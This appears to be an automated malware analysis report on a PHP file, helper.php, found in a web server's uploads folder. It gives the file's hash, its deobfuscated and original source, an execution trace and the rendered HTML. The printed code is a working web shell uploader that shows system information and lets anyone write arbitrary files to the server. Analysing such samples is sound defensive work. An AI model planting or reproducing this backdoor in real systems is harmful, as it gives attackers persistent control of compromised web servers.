PHP Malware Analysis

helper.php

md5: 3320904323efd271130400ea7065dec0

Deobfuscated PHP code

n4sss
<?php 
echo '<b><br><br><br><br><br><br><center><font color:"blue"><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">' . php_uname() . '</font><br></b>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Arquivo upado !!!</b><br><br>";
    } else {
        echo "<b>Upload Fail !!!</b><br><br></font>";
    }
}

Execution traces

data/traces/3320904323efd271130400ea7065dec0_trace-1676242586.5144.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:52.412263]
1	0	1	0.000136	393528
1	3	0	0.000194	396368	{main}	1		/var/www/html/uploads/helper.php	0	0
2	4	0	0.000211	396368	php_uname	0		/var/www/html/uploads/helper.php	2	0
2	4	1	0.000226	396480
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000263	396368
			0.000288	314240
TRACE END   [2023-02-12 20:56:52.412442]


Generated HTML code

<html><head></head><body>n4sss
<b><br><br><br><br><br><br></b><center><b><font color:"blue"=""><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font><br></span></span></font></b><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><font color:"blue"=""><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></font></form></center></body></html>

Original PHP code

n4sss
<?php echo '<b><br><br><br><br><br><br><center><font color:"blue"><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">'.php_uname().'</font><br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Arquivo upado !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br></font>'; } } ?>